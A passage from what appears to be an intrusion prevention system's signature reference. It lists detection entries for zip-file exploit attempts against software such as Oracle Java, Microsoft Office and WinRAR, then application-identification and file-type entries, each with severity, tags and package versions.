Tags: Any Operating System, Any Hardware, Sun Java Runtime Environment, Sun Java Development Kit, CVE2009, CVE2010, CVE2012, Any Operating System not specific, Suspected Compromise, Severity over 4 Correlation Dependency Group
First detected in: sgpkg-ips-429-4219
Last changed: sgpkg-ips-557-5211
Vulnerability: Shellcode-Encoder
Java-Unsigned-Applet-Execution
Sun-Java-Runtime-Awt-Setdifflcm-Stack-Buffer-Overflow
Java-Deserialization-Privilege-Escalation
Java-Runtime-Environment-Remote-Code-Execution
Java-Runtime-Environment-JAX-WS-Remote-Code-Execution
Java-Trusted-Method-Chain-Privilege-Escalation
Java-MixerSequencer-Buffer-Overflow
Description:
Back to top

File-Zip_Microsoft-Java-VM-Bytecode-Verifier-Bypass-JAR

About this situation: An attempt to exploit a vulnerability in Microsoft Java VM detected
Context: Zip File Stream
Severity: 10
Tags: Windows XP, Windows 95, Windows 98, Windows 2000, Windows ME, Windows NT 4.0, x86, MS2003, CVE2003, Windows XP not specific, Windows 2000 not specific, Windows NT 4.0 not specific, Compromise, Severity over 4 Correlation Dependency Group
First detected in: sgpkg-ips-407-4219
Last changed: sgpkg-ips-1284-5242
Vulnerability: Microsoft-Java-VM-Bytecode-Verifier-Bypass
Description:
Back to top

File-Zip_Microsoft-Office-Excel-Xlsx-File-Parsing-Code-Execution

About this situation: An attempt to exploit a vulnerability in Microsoft Office Compatibility Pack detected
Context: Zip File Stream
Severity: 7
Tags: Any Operating System, Any Hardware, Microsoft Excel, MS2010-03, CVE2010, Any Operating System not specific, Microsoft Excel not specific, Suspected Compromise, Severity over 4 Correlation Dependency Group
First detected in: sgpkg-ips-414-4219
Last changed: sgpkg-ips-1284-5242
Vulnerability: Microsoft-Office-Excel-Xlsx-File-Parsing-Code-Execution
Description:
Back to top

File-Zip_Microsoft-Office-Open-XML-TIFF-Filename-Detected

About this situation: TIFF image within Microsoft Office Open XML container detected
Context: Zip File Stream
Severity: 2
Tags: Windows, Any Hardware, Microsoft Office, Windows Server, Microsoft Lync, MS2013-12, CVE2013, Windows not specific, Microsoft Office not specific, Possibly Unwanted Content
First detected in: sgpkg-ips-552-5211
Last changed: sgpkg-ips-557-5211
Vulnerability: Microsoft-Windows-And-Office-TIFF-Handling-GDI-Memory-Corruption
Description:
Back to top

File-Zip_Microsoft-Office-Remote-Code-Execution-CVE-2025-21365

About this situation: An attempt to exploit a vulnerability in Microsoft Office detected
Context: Zip File Stream
Severity: 7
Tags: Windows, Any Hardware, Microsoft Office, MS2025-01, CVE2025, Windows not specific, Microsoft Office not specific, Potential Compromise, Severity over 4 Correlation Dependency Group
First detected in: sgpkg-ips-1824-5242
Last changed: sgpkg-ips-1824-5242
Vulnerability: Microsoft-Office-Remote-Code-Execution-CVE-2025-21365
Description:
Back to top

File-Zip_Microsoft-Visual-Studio-Python-Interpreter-RCE

About this situation: An attempt to exploit a vulnerability in Microsoft Visual Studio detected
Context: Zip File Stream
Severity: 7
Tags: Windows, Any Hardware, Microsoft Visual Studio, CVE2021, Windows not specific, Microsoft Visual Studio not specific, Potential Compromise, Severity over 4 Correlation Dependency Group
First detected in: sgpkg-ips-1363-5242
Last changed: sgpkg-ips-1862-5242
Vulnerability: Microsoft-Visual-Studio-Python-Interpreter-RCE
Description:
Back to top

File-Zip_Microsoft-Windows-And-Office-TIFF-Handling-GDI-Memory-Corruption-1

About this situation: An attempt to exploit a vulnerability in Microsoft Lync detected
Context: Zip File Stream
Severity: 7
Tags: Windows, Any Hardware, Microsoft Office, Windows Server, Microsoft Lync, MS2013-12, CVE2013, Windows not specific, Microsoft Office not specific, Suspected Compromise, Severity over 4 Correlation Dependency Group
First detected in: sgpkg-ips-552-5211
Last changed: sgpkg-ips-1284-5242
Vulnerability: Microsoft-Windows-And-Office-TIFF-Handling-GDI-Memory-Corruption
Description:
Back to top

File-Zip_Microsoft-Windows-And-Office-TIFF-Handling-GDI-Memory-Corruption-3

About this situation: An attempt to exploit a vulnerability in Microsoft Lync detected
Context: Zip File Stream
Severity: 7
Tags: Windows, Any Hardware, Microsoft Office, Windows Server, Microsoft Lync, MS2013-12, CVE2013, Windows not specific, Microsoft Office not specific, Suspected Compromise, Severity over 4 Correlation Dependency Group
First detected in: sgpkg-ips-552-5211
Last changed: sgpkg-ips-1284-5242
Vulnerability: Microsoft-Windows-And-Office-TIFF-Handling-GDI-Memory-Corruption
Description:
Back to top

File-Zip_Microsoft-Windows-Media-Player-Skin-Parsing-Code-Execution

About this situation: An attempt to exploit a vulnerability in Microsoft Windows Media Player detected
Context: Zip File Stream
Severity: 7
Tags: Windows, Any Hardware, MS2007-08, CVE2007, Windows not specific, Potential Compromise, Severity over 4 Correlation Dependency Group
First detected in: sgpkg-ips-415-4219
Last changed: sgpkg-ips-1821-5242
Vulnerability: Microsoft-Windows-Media-Player-Skin-Parsing-Code-Execution
Description:
Back to top

File-Zip_Microsoft-Windows-MFC-Document-Title-Updating-Buffer-Overflow

About this situation: An attempt to exploit a vulnerability in Microsoft Windows detected
Context: Zip File Stream
Severity: 7
Tags: Windows, Any Hardware, PowerZip, MS2010-10, CVE2010, Windows not specific, Suspected Compromise, Severity over 4 Correlation Dependency Group
First detected in: sgpkg-ips-740-5211
Last changed: sgpkg-ips-1841-5242
Vulnerability: Microsoft-Windows-MFC-Document-Title-Updating-Buffer-Overflow
Description:
Back to top

File-Zip_Microsoft-Windows-Shell-Zip-File-Remote-Code-Execution

About this situation: An attempt to exploit a vulnerability in Microsoft Windows detected
Context: Zip File Stream
Severity: 7
Tags: Windows, Any Hardware, CVE2018, Windows not specific, Suspected Compromise, Severity over 4 Correlation Dependency Group
First detected in: sgpkg-ips-1059-5242
Last changed: sgpkg-ips-1848-5242
Vulnerability: Microsoft-Windows-Shell-Zip-File-Remote-Code-Execution
Description:
Back to top

File-Zip_MS-Compressed-Folders-DUNZIP32-DLL-Buffer-Overflow-MS04-034

About this situation: An attempt to exploit a vulnerability in Windows detected
Context: Zip File Stream
Severity: 7
Tags: Windows, Any Hardware, MS2004-10, CVE2004, Windows not specific, Suspected Compromise, Severity over 4 Correlation Dependency Group
First detected in: sgpkg-ips-410-4219
Last changed: sgpkg-ips-557-5211
Vulnerability: MS-Compressed-Folders-DUNZIP32-DLL-Buffer-Overflow-MS04-034
Description:
Back to top

File-Zip_Norton-AntiVirus-Decompression-Bomb-Denial-Of-Service

About this situation: An attempt to exploit a vulnerability in Symantec Mail Security detected
Context: Zip File Stream
Severity: 7
Tags: Any Operating System, Any Hardware, Symantec Norton AntiVirus, Any Operating System not specific, Suspected Compromise, Severity over 4 Correlation Dependency Group
First detected in: sgpkg-ips-436-4219
Last changed: sgpkg-ips-557-5211
Vulnerability: Norton-AntiVirus-Decompression-Bomb-Denial-Of-Service
Description:
Back to top

File-Zip_Opencart-Archive-Extraction-Directory-Traversal

About this situation: An attempt to exploit a vulnerability in OpenCart detected
Context: Zip File Stream
Severity: 7
Tags: Any Operating System, Any Hardware, OpenCart, CVE2024, Any Operating System not specific, Suspected Compromise, Severity over 4 Correlation Dependency Group
First detected in: sgpkg-ips-1759-5242
Last changed: sgpkg-ips-1759-5242
Vulnerability: Opencart-Archive-Extraction-Directory-Traversal
Description:
Back to top

File-Zip_Oracle-Java-7-Applet-Remote-Code-Execution

About this situation: A vulnerability in Oracle Java Runtime Environment
Context: Zip File Stream
Severity: 7
Tags: Any Operating System, Any Hardware, Oracle Java Runtime Environment, CVE2012, Any Operating System not specific, Suspected Compromise, Severity over 4 Correlation Dependency Group
First detected in: sgpkg-ips-557-5211
Last changed: sgpkg-ips-1284-5242
Vulnerability: Oracle-Java-7-Applet-Remote-Code-Execution
Description:
Back to top

File-Zip_Oracle-Java-Atomicreferencearray-Sandbox-Breach

About this situation: An attempt to exploit a vulnerability in Oracle Java Development Kit (JDK) detected
Context: Zip File Stream
Severity: 7
Tags: Any Operating System, Any Hardware, Oracle Java Runtime Environment, Oracle OpenJDK, Oracle Java Development Kit, CVE2012, Any Operating System not specific, Suspected Compromise, Severity over 4 Correlation Dependency Group
First detected in: sgpkg-ips-503-5211
Last changed: sgpkg-ips-1284-5242
Vulnerability: Oracle-Java-Atomicreferencearray-Sandbox-Breach
Description:
Back to top

File-Zip_Oracle-Java-Final-Field-Overwrite

About this situation: An attempt to exploit a vulnerability in Oracle Java Development Kit (JDK) detected
Context: Zip File Stream
Severity: 7
Tags: Any Operating System, Any Hardware, Oracle Java Runtime Environment, Oracle Java Development Kit, CVE2013, Any Operating System not specific, Suspected Compromise, Severity over 4 Correlation Dependency Group
First detected in: sgpkg-ips-561-5211
Last changed: sgpkg-ips-1284-5242
Vulnerability: Oracle-Java-Final-Field-Overwrite
Description:
Back to top

File-Zip_Oracle-Java-Font-Processing-Memory-Corruption

About this situation: An attempt to exploit a vulnerability in Oracle Java Runtime Environment (JRE) detected
Context: Zip File Stream
Severity: 7
Tags: Any Operating System, Any Hardware, Oracle Java Runtime Environment, Oracle Java Development Kit, Oracle JavaFX, CVE2013, Any Operating System not specific, Suspected Compromise, Severity over 4 Correlation Dependency Group
First detected in: sgpkg-ips-525-5211
Last changed: sgpkg-ips-1284-5242
Vulnerability: Oracle-Java-Font-Processing-Memory-Corruption
Description:
Back to top

File-Zip_Oracle-Java-Java.awt.image.integercomponentraster-Memory-Corruption

About this situation: An attempt to exploit vulnerability in Oracle Java Runtime Environment (JRE) detected
Context: Zip File Stream
Severity: 7
Tags: Any Operating System, Any Hardware, Oracle Java Runtime Environment, Oracle Java Development Kit, CVE2013, Any Operating System not specific, Suspected Compromise, Severity over 4 Correlation Dependency Group
First detected in: sgpkg-ips-561-5211
Last changed: sgpkg-ips-1284-5242
Vulnerability: Oracle-Java-Java.awt.image.integercomponentraster-Memory-Corruption
Description:
Back to top

File-Zip_Oracle-Java-Java.sql.drivermanager-Sandbox-Bypass

About this situation: An attempt to exploit a vulnerability in Oracle Java Runtime Environment (JRE) detected
Context: Zip File Stream
Severity: 7
Tags: Any Operating System, Any Hardware, Oracle Java Runtime Environment, Oracle Java Development Kit, CVE2013, Any Operating System not specific, Suspected Compromise, Severity over 4 Correlation Dependency Group
First detected in: sgpkg-ips-561-5211
Last changed: sgpkg-ips-1284-5242
Vulnerability: Oracle-Java-Java.sql.drivermanager-Sandbox-Bypass
Description:
Back to top

File-Zip_Oracle-Java-Jmx-Findclass-And-Elementfromcomplex-Sandbox-Breach

About this situation: An attempt to exploit a vulnerability in Oracle JRE detected
Context: Zip File Stream
Severity: 7
Tags: Any Operating System, Any Hardware, Oracle Java Runtime Environment, Oracle Java Development Kit, CVE2013, Any Operating System not specific, Suspected Compromise, Severity over 4 Correlation Dependency Group
First detected in: sgpkg-ips-561-5211
Last changed: sgpkg-ips-1284-5242
Vulnerability: Oracle-Java-Jmx-Findclass-And-Elementfromcomplex-Sandbox-Breach
Description:
Back to top

File-Zip_Oracle-Java-Rmi-Services-Default-Configuration-Remote-Code-Execution

About this situation: An attempt to exploit a vulnerability in Oracle Java detected
Context: Zip File Stream
Severity: 7
Tags: Any Operating System, Any Hardware, Oracle Java Runtime Environment, CVE2011, Any Operating System not specific, Suspected Compromise, Severity over 4 Correlation Dependency Group
First detected in: sgpkg-ips-432-4219
Last changed: sgpkg-ips-557-5211
Vulnerability: Oracle-Java-Rmi-Services-Default-Configuration-Remote-Code-Execution
Description:
Back to top

File-Zip_Oracle-Java-Runtime-Bytecode-Verifier-Cache-Code-Execution

About this situation: An attempt to exploit a vulnerability in Oracle Java Runtime Environment (JRE) detected
Context: Zip File Stream
Severity: 7
Tags: Any Operating System, Any Hardware, Oracle Java Runtime Environment, CVE2012, Any Operating System not specific, Suspected Compromise, Severity over 4 Correlation Dependency Group
First detected in: sgpkg-ips-464-5211
Last changed: sgpkg-ips-1284-5242
Vulnerability: Oracle-Java-Runtime-Bytecode-Verifier-Cache-Code-Execution
Description:
Back to top

File-Zip_Oracle-Java-Runtime-Environment-Storeimagearray-Buffer-Overflow

About this situation: An attempt to exploit vulnerability in Oracle Java Runtime Environment (JRE) detected
Context: Zip File Stream
Severity: 7
Tags: Any Operating System, Any Hardware, Oracle Java Runtime Environment, Oracle Java Development Kit, CVE2013, Any Operating System not specific, Suspected Compromise, Severity over 4 Correlation Dependency Group
First detected in: sgpkg-ips-561-5211
Last changed: sgpkg-ips-1284-5242
Vulnerability: Oracle-Java-Runtime-Environment-Storeimagearray-Buffer-Overflow
Description:
Back to top

File-Zip_Oracle-Java-Sun.awt.image.imagerepresentation.setpixels-Integer-Overflow

About this situation: An attempt to exploit a vulnerability in Oracle Java Development Kit (JDK) detected
Context: Zip File Stream
Severity: 7
Tags: Any Operating System, Any Hardware, Oracle Java Runtime Environment, Oracle Java Development Kit, CVE2013, Any Operating System not specific, Suspected Compromise, Severity over 4 Correlation Dependency Group
First detected in: sgpkg-ips-561-5211
Last changed: sgpkg-ips-1284-5242
Vulnerability: Oracle-Java-Sun.awt.image.imagerepresentation.setpixels-Integer-Overflow
Description:
Back to top

File-Zip_Oracle-Java-Sun.tracing.providerskeleton-Sandbox-Bypass

About this situation: An attempt to exploit a vulnerability in Oracle Java Development Kit (JDK) detected
Context: Zip File Stream
Severity: 7
Tags: Any Operating System, Any Hardware, Oracle Java Runtime Environment, Oracle Java Development Kit, CVE2013, Any Operating System not specific, Suspected Compromise, Severity over 4 Correlation Dependency Group
First detected in: sgpkg-ips-557-5211
Last changed: sgpkg-ips-1284-5242
Vulnerability: Oracle-Java-Sun.tracing.providerskeleton-Sandbox-Bypass
Description:
Back to top

File-Zip_Oracle-Java-Zip_Util-Readcen-Stack-Overflow

About this situation: An attempt to exploit a vulnerability in Oracle Java Runtime Environment (JRE) detected
Context: Zip File Stream
Severity: 7
Tags: Any Operating System, Any Hardware, Oracle Java Runtime Environment, Oracle OpenJDK, Oracle Java Development Kit, CVE2012, Any Operating System not specific, Suspected Compromise, Severity over 4 Correlation Dependency Group
First detected in: sgpkg-ips-442-4219
Last changed: sgpkg-ips-557-5211
Vulnerability: Oracle-Java-Zip_Util-Readcen-Stack-Overflow
Description:
Back to top

File-Zip_Oracle-JRE-Shortcomponentraster.verify-Memory-Corruption

About this situation: An attempt to exploit a vulnerability in Oracle Java Runtime Environment (JRE) detected
Context: Zip File Stream
Severity: 7
Tags: Any Operating System, Any Hardware, Oracle Java Runtime Environment, Oracle Java Development Kit, CVE2013, Any Operating System not specific, Potential Compromise, Severity over 4 Correlation Dependency Group
First detected in: sgpkg-ips-544-5211
Last changed: sgpkg-ips-570-5211
Vulnerability: Oracle-JRE-Shortcomponentraster.verify-Memory-Corruption
Description:
Back to top

File-Zip_Perl-Archive-Zip-Arbitrary-File-Overwrite

About this situation: An attempt to exploit a vulnerability in Perl Foundation Archive::Zip detected
Context: Zip File Stream
Severity: 7
Tags: Any Operating System, Any Hardware, Perl, CVE2018, Any Operating System not specific, Suspected Compromise, Severity over 4 Correlation Dependency Group
First detected in: sgpkg-ips-1105-5242
Last changed: sgpkg-ips-1105-5242
Vulnerability: Perl-Archive-Zip-Arbitrary-File-Overwrite
Description:
Back to top

File-Zip_Php-Group-Php-Zip-Integer-Overflow

About this situation: An attempt to exploit a vulnerability in PHP Group PHP detected
Context: Zip File Stream
Severity: 7
Tags: Any Operating System, Any Hardware, PHP, CVE2015, Any Operating System not specific, Potential Compromise, Severity over 4 Correlation Dependency Group
First detected in: sgpkg-ips-639-5211
Last changed: sgpkg-ips-1858-5242
Vulnerability: Php-Group-Php-Zip-Integer-Overflow
Description:
Back to top

File-Zip_PPH-Ziparchive-Getfromindex-And-Getfromname-Integer-Overflow

About this situation: An attempt to exploit a vulnerability in PHP Group PHP detected
Context: Zip File Stream
Severity: 7
Tags: Any Operating System, Any Hardware, PHP, CVE2016, Any Operating System not specific, Potential Compromise, Severity over 4 Correlation Dependency Group
First detected in: sgpkg-ips-761-5211
Last changed: sgpkg-ips-768-5211
Vulnerability: PHP-Ziparchive-Getfromindex-And-Getfromname-Integer-Overflow
Description:
Back to top

File-Zip_RARLAB-WinRAR-Zip-File-Out-of-Bounds-Read

About this situation: An attempt to exploit a vulnerability in RARLAB WinRAR detected
Context: Zip File Stream
Severity: 7
Tags: Any Operating System, Any Hardware, RARLAB WinRAR, CVE2022, Any Operating System not specific, Potential Compromise, Severity over 4 Correlation Dependency Group
First detected in: sgpkg-ips-1608-5242
Last changed: sgpkg-ips-1844-5242
Vulnerability: RARLAB-WinRAR-Zip-File-Out-of-Bounds-Read
Description:
Back to top

File-Zip_Shared-Variables

About this situation: This fingerprint sets shared variables
Context: Zip File Stream
Severity: 1
Tags: Any Operating System, Any Hardware, Any Operating System not specific, System Inspections
First detected in: sgpkg-ips-557-5211
Last changed: sgpkg-ips-1824-5242
Vulnerability: Generic-Shared-Variables
Description:
Back to top

File-Zip_Softing-Secure-Integration-Server-v1.22-RCE

About this situation: An attempt to exploit a vulnerability in Softing Secure Integration Server detected
Context: Zip File Stream
Severity: 7
Tags: Windows, Any Hardware, Softing Secure Integration Server, CVE2022, Windows not specific, Suspected Compromise, Severity over 4 Correlation Dependency Group
First detected in: sgpkg-ips-1769-5242
Last changed: sgpkg-ips-1769-5242
Vulnerability: Softing-Secure-Integration-Server-v1.22-RCE
Description:
Back to top

File-Zip_Suspicious-File-Detected

About this situation: A suspicious ZIP file detected
Context: Zip File Stream
Severity: 2
Tags: Any Operating System, Any Hardware, Any Operating System not specific, Possibly Unwanted Content
First detected in: sgpkg-ips-557-5211
Last changed: sgpkg-ips-557-5211
Vulnerability: Generic-HTTP-Exploit
Description:
Back to top

File-Zip_Suspicious-Filename-In-Archive

About this situation: A suspicious filename in zip archive was detected
Context: Zip File Stream
Severity: 7
Tags: Windows, Any Hardware, BitDefender Internet Security, CVE2009, Windows not specific, Potential Compromise, Severity over 4 Correlation Dependency Group
First detected in: sgpkg-ips-407-4219
Last changed: sgpkg-ips-557-5211
Vulnerability: BitDefender-Internet-Security-Filename-Cross-Script-Script-Code-Execution
Description:
Back to top

File-Zip_Suspicious-JAR-File-With-Image-Extension

About this situation: A suspicious JAR file with an image extension detected
Context: Zip File Stream
Severity: 7
Tags: Any Operating System, Any Hardware, Versa Director, CVE2024, Any Operating System not specific, Suspected Compromise, Severity over 4 Correlation Dependency Group
First detected in: sgpkg-ips-1821-5242
Last changed: sgpkg-ips-1821-5242
Vulnerability: Versa-Director-Favicon-Unrestricted-File-Upload-CVE-2024-39717
Description:
Back to top

File-Zip_Symantec-Brightmail-AntiSpam-Nested-Zip-Handling-Denial-of-Service

About this situation: A Symantec Brightmail AntiSpam Nested Zip Handling Denial of Service vulnerability
Context: Zip File Stream
Severity: 7
Tags: Any Operating System, Any Hardware, Symantec Brightmail AntiSpam, Any Operating System not specific, Potential Compromise, Severity over 4 Correlation Dependency Group
First detected in: sgpkg-ips-1009-5242
Last changed: sgpkg-ips-1009-5242
Vulnerability: Symantec-Brightmail-AntiSpam-Nested-Zip-Handling-Denial-of-Service
Description:
Back to top

File-Zip_Trend-Micro-OfficeScan-Zip-Directory-Traversal-CVE-2019-18187

About this situation: An attempt to exploit a vulnerability in Trend Micro OfficeScan detected
Context: Zip File Stream
Severity: 7
Tags: Any Operating System, Any Hardware, Trend Micro OfficeScan, CVE2019, Any Operating System not specific, Suspected Compromise, Severity over 4 Correlation Dependency Group
First detected in: sgpkg-ips-1210-5242
Last changed: sgpkg-ips-1210-5242
Vulnerability: Trend-Micro-OfficeScan-Zip-Directory-Traversal-CVE-2019-18187
Description:
Back to top

File-Zip_Unitronics-VisiLogic-OPLC-IDE-Vlp-File-Parsing-Heap-Buffer-Overflow

About this situation: An attempt to exploit a vulnerability in Unitronics VisiLogic OPLC detected
Context: Zip File Stream
Severity: 7
Tags: Any Operating System, Any Hardware, Unitronics VisiLogic OPLC, CVE2015, Any Operating System not specific, Potential Compromise, Severity over 4 Correlation Dependency Group
First detected in: sgpkg-ips-724-5211
Last changed: sgpkg-ips-724-5211
Vulnerability: Unitronics-VisiLogic-OPLC-IDE-Vlp-File-Parsing-Heap-Buffer-Overflow
Description:
Back to top

File-Zip_Unzip-Extra-Field-Uncompressed-Size-Buffer-Overflow

About this situation: An attempt to exploit a vulnerability in Info-ZIP UnZip detected
Context: Zip File Stream
Severity: 7
Tags: Any Operating System, Any Hardware, Info-ZIP UnZip, CVE2014, Any Operating System not specific, Suspected Compromise, Severity over 4 Correlation Dependency Group
First detected in: sgpkg-ips-637-5211
Last changed: sgpkg-ips-1841-5242
Vulnerability: Unzip-Extra-Field-Uncompressed-Size-Buffer-Overflow
Description:
Back to top

File-Zip_Wordpress-Plugin-Elementor-Authenticated-Upload-Remote-Code-Execution

About this situation: An attempt to exploit a vulnerability in the WordPress plugin Elementor detected.
Context: Zip File Stream
Severity: 7
Tags: Any Operating System, Any Hardware, WordPress Elementor Plugin, CVE2022, Any Operating System not specific, Suspected Compromise, Severity over 4 Correlation Dependency Group
First detected in: sgpkg-ips-1525-5242
Last changed: sgpkg-ips-1525-5242
Vulnerability: Wordpress-Plugin-Elementor-Authenticated-Upload-Remote-Code-Execution
Description:
Back to top

File-Zip_Writeablebitmap-Setsource-Information-Disclosure

About this situation: An attempt to exploit vulnerability in Microsoft Silverlight detected
Context: Zip File Stream
Severity: 7
Tags: Windows, Any Hardware, Silverlight, MS2013-10, CVE2013, Windows not specific, Suspected Compromise, Severity over 4 Correlation Dependency Group
First detected in: sgpkg-ips-561-5211
Last changed: sgpkg-ips-1284-5242
Vulnerability: Microsoft-Silverlight-Writeablebitmap-Setsource-Information-Disclosure
Description:
Back to top

File-Zip_Zoho-Manageengine-Desktop-Central-Appdependency-Arbitrary-File-Write

About this situation: An attempt to exploit a vulnerability in Zoho Corporation ManageEngine Desktop Central detected
Context: Zip File Stream
Severity: 7
Tags: Any Operating System, Any Hardware, Zoho Corporation ManageEngine Desktop Central, CVE2020, Any Operating System not specific, Suspected Compromise, Severity over 4 Correlation Dependency Group
First detected in: sgpkg-ips-1270-5242
Last changed: sgpkg-ips-1270-5242
Vulnerability: Zoho-Manageengine-Desktop-Central-Appdependency-Arbitrary-File-Write
Description:
Back to top

FileBound

About this situation: Application FileBound detected
Context: Application Context
Severity: 1
Tags: Cloud Services, Miscellaneous, Application Routing
First detected in: sgpkg-ips-1041-5242
Last changed: sgpkg-ips-1678-5242
Description: FileBound is a cloud-based application that automates the flow of enterprise work. Helps manage business processes from beginning to end, and connect people and information wherever they are.
Back to top

FileCatalyst

About this situation: Application FileCatalyst detected
Context: Application Context
Severity: 1
Tags: Cloud Services, Storage, Application Routing
First detected in: sgpkg-ips-1041-5242
Last changed: sgpkg-ips-1678-5242
Description: FileCatalyst provides software solutions to accelerate file transfers by 100x faster than FTP.
Back to top

filecloud.io

About this situation: filecloud.io usage detected
Context: Application Context
Severity: 1
Tags: Web Applications, Storage, Application Routing
First detected in: sgpkg-ips-559-5211
Last changed: sgpkg-ips-629-5211
Description: This site is a global data storage service that allows users to upload and share multimedia files.
Back to top

Fileden

About this situation: fileDEN usage detected
Context: Application Context
Severity: 1
Tags: Web Applications, File Sharing, Application Routing
First detected in: sgpkg-ips-559-5211
Last changed: sgpkg-ips-1764-5242
Description: A file-sharing service that allows users to upload/download files over the web.
Back to top

Filefactory

About this situation: FileFactory usage detected
Context: Application Context
Severity: 1
Tags: Web Applications, File Sharing, Application Routing
First detected in: sgpkg-ips-559-5211
Last changed: sgpkg-ips-1764-5242
Description: A file-sharing service that allows users to upload/download files over the web.
Back to top

Fileguri

About this situation: Fileguri usage detected
Context: Application Context
Severity: 1
Tags: Web Applications, File Sharing, Application Routing
First detected in: sgpkg-ips-508-5211
Last changed: sgpkg-ips-630-5211
Description: Fileguri is a peer-to-peer (P2P) file-sharing software/service targeted for Korean-speaking population.
Back to top

Filehippo

About this situation: FileHippo usage detected
Context: Application Context
Severity: 1
Tags: Web Applications, File Sharing, Application Routing
First detected in: sgpkg-ips-559-5211
Last changed: sgpkg-ips-1764-5242
Description: A file-sharing service that allows users to upload/download files over the web.
Back to top

FileHold

About this situation: Application FileHold detected
Context: Application Context
Severity: 1
Tags: Cloud Services, Miscellaneous, Application Routing
First detected in: sgpkg-ips-1041-5242
Last changed: sgpkg-ips-1678-5242
Description: FileHold is full-featured document management software for any size of business. Its enterprise class suite of features provide for document capture, indexing, storage, search, versioning, and workflow reviews and approvals.
Back to top

Filehost.co.za

About this situation: filehost.co.za usage detected
Context: Application Context
Severity: 1
Tags: Web Applications, Storage, Application Routing
First detected in: sgpkg-ips-559-5211
Last changed: sgpkg-ips-1764-5242
Description: A South African file-hosting site
Back to top

Filehost.ro

About this situation: FileHost.ro usage detected
Context: Application Context
Severity: 1
Tags: Web Applications, Storage, Application Routing
First detected in: sgpkg-ips-559-5211
Last changed: sgpkg-ips-1764-5242
Description: A Romanian file hosting site
Back to top

Filekicker

About this situation: FILEKicker usage detected
Context: Application Context
Severity: 1
Tags: Web Applications, File Sharing, Application Routing
First detected in: sgpkg-ips-559-5211
Last changed: sgpkg-ips-1764-5242
Description: A file-sharing service that allows users to upload/download files over the web.
Back to top

Filemail.com

About this situation: filemail.com usage detected
Context: Application Context
Severity: 1
Tags: Web Applications, File Sharing, Application Routing
First detected in: sgpkg-ips-559-5211
Last changed: sgpkg-ips-1764-5242
Description: This service allows users to send and receive large files.
Back to top

Filenara

About this situation: Filenara usage detected
Context: Application Context
Severity: 1
Tags: Web Applications, P2P, Application Routing
First detected in: sgpkg-ips-559-5211
Last changed: sgpkg-ips-1764-5242
Description: A Korean peer-to-peer file sharing site
Back to top

Fileplanet

About this situation: FilePlanet usage detected
Context: Application Context
Severity: 1
Tags: Web Applications, Games, Application Routing
First detected in: sgpkg-ips-559-5211
Last changed: sgpkg-ips-1764-5242
Description: A Web-based Gaming service where users can play games or get gaming information online using a web browser.
Back to top

Filer.cx

About this situation: Filer.cx usage detected
Context: Application Context
Severity: 1
Tags: Web Applications, File Sharing, Application Routing
First detected in: sgpkg-ips-409-4219
Last changed: sgpkg-ips-630-5211
Description: Filer.cx is file hosting service.
Back to top

Files Containing Passwords

About this situation: Files Containing Passwords
Context: URL Application Context
Severity: 1
Tags: Security, Security Risk
First detected in: sgpkg-ips-799-5211
Last changed: sgpkg-ips-1559-5242
Description: Files Containing Passwords
Back to top

files.to

About this situation: files.to usage detected
Context: Application Context
Severity: 1
Tags: Web Applications, File Sharing, Application Routing
First detected in: sgpkg-ips-442-4219
Last changed: sgpkg-ips-630-5211
Description: files.to is a web-based file hosting service, which lets users to upload, download, remove and share various type of files. The service can be accessed using a web browser at the site: http://www.files.to.
Back to top

Filesanywhere

About this situation: filesanywhere usage detected
Context: Application Context
Severity: 1
Tags: Web Applications, File Sharing, Application Routing
First detected in: sgpkg-ips-559-5211
Last changed: sgpkg-ips-1764-5242
Description: A file-sharing service that allows users to upload/download files over the web.
Back to top

Filesdirect

About this situation: filesDIRECT usage detected
Context: Application Context
Severity: 1
Tags: Web Applications, File Sharing, Application Routing
First detected in: sgpkg-ips-559-5211
Last changed: sgpkg-ips-1764-5242
Description: A file-sharing service that allows users to upload/download files over the web.
Back to top

Fileserve-Upload

About this situation: fileserve Upload usage detected
Context: Application Context
Severity: 1
Tags: Web Applications, File Sharing, Application Routing
First detected in: sgpkg-ips-559-5211
Last changed: sgpkg-ips-629-5211
Description: is an online file hosting service.
Back to top

FileSociety

About this situation: Application FileSociety detected
Context: Application Context
Severity: 1
Tags: Cloud Services, Miscellaneous, Application Routing
First detected in: sgpkg-ips-1041-5242
Last changed: sgpkg-ips-1678-5242
Description: FileSociety - collaborative high speed file transfer solution.
Back to top

FileSonic

About this situation: FileSonic usage detected
Context: Application Context
Severity: 1
Tags: Web Applications, File Sharing, Application Routing
First detected in: sgpkg-ips-509-5211
Last changed: sgpkg-ips-630-5211
Description: FileSonic is a fast and easy file storage and sharing service. The service provides users advanced file management and sharing features to secure valuable data and share files that are too large to be sent by email.
Back to top

FilesTube

About this situation: FilesTube usage detected
Context: Application Context
Severity: 1
Tags: Web Applications, File Sharing, Application Routing
First detected in: sgpkg-ips-439-4219
Last changed: sgpkg-ips-630-5211
Description: FilesTube is a search engine designed to search files in various file sharing and uploading sites like rapidshare, megaupload, mediafire, hotfile, netload, filesonic, and 4shared. The service can be accessed using a web browser at http://www.filestube.com.
Back to top

File_7z-Archive

About this situation: 7z archive file detected
Context: File Type
Severity: 1
Tags: 7z Archive, Internal File Type Tag, File Filtering
First detected in: sgpkg-ips-743-5211
Last changed: sgpkg-ips-743-5211
Description: 7z is an archiving file format introduced by 7-Zip archiver. 7-Zip is free and open source file compression and archiving utility that supports various archiving and compression file formats. MIME type: application/x-7z-compressed
Back to top

File_ACE-Archive

About this situation: ACE archive file detected
Context: File Type
Severity: 1
Tags: ACE Archive, Internal File Type Tag, File Filtering
First detected in: sgpkg-ips-703-5211
Last changed: sgpkg-ips-1531-5242
Description: ACE archive file detected. MIME type: application/x-ace
Back to top

File_Adobe-Audition

About this situation: Adobe Audition audio file detected
Context: File Type
Severity: 1
Tags: Adobe Audition audio, Internal File Type Tag, File Filtering
First detected in: sgpkg-ips-703-5211
Last changed: sgpkg-ips-1531-5242
Description: Adobe Audition a multitrack audio editing and mixing application developed by Adobe Systems.
Back to top

File_Adobe-Cross-Domain-Policy

About this situation: Cross Domain Policy file detected
Context: File Type
Severity: 1
Tags: Adobe Cross Domain Policy, Internal File Type Tag, File Filtering
First detected in: sgpkg-ips-774-5211
Last changed: sgpkg-ips-774-5211
Description: Cross Domain Policy is an XML document. It is used to allow a web client to access data across domains, and it is used by Adobe Flash among others.
Back to top

File_Adobe-Flash

About this situation: Flash File detected
Context: File Type
Severity: 1
Tags: Adobe Flash, Internal File Type Tag, File Filtering
First detected in: sgpkg-ips-703-5211
Last changed: sgpkg-ips-1531-5242
